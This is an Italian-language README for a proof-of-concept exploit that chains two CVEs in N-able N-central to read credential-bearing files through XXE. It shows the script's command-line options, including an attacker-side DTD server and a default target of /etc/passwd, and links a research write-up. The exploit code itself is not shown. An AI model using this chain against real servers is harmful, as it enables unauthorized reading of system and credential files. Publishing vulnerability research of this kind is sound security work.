
Prova di concetto exploit per N-able N-central per concatenare CVE-2025-9316 e CVE-2025-11700 per leggere file
Proof of concept exploit per N-able N-central per concatenare CVE-2025-9316 e CVE-2025-11700 per leggere file contenenti credenziali
Analisi approfondita qui: https://www.horizon3.ai/attack-research/attack-blogs/n-able-n-central-from-n-days-to-0-days/
% python3 ncentral_xxe_file_read.py -h
usage: ncentral_xxe_file_read.py [-h] --url URL --listen-ip LISTEN_IP --listen-port LISTEN_PORT [--file FILE] [--appliance-id APPLIANCE_ID] [--test-only]
N-able N-Central XXE Vulnerability Exploit
options:
-h, --help show this help message and exit
--url URL N-Central Base URL
--listen-ip LISTEN_IP
IP address for DTD server to bind to
--listen-port LISTEN_PORT
Port for DTD server to bind to
--file FILE Target file to read (default: /etc/passwd)
--appliance-id APPLIANCE_ID
Appliance ID to use (default: 3)
--test-only Only test endpoint accessibility
Questo software è stato creato esclusivamente per scopi di ricerca accademica e per lo sviluppo di tecniche difensive efficaci, e non deve essere utilizzato per attaccare sistemi se non esplicitamente autorizzato. I manutentori del progetto non sono responsabili per l'uso improprio del software. Usa responsabilmente.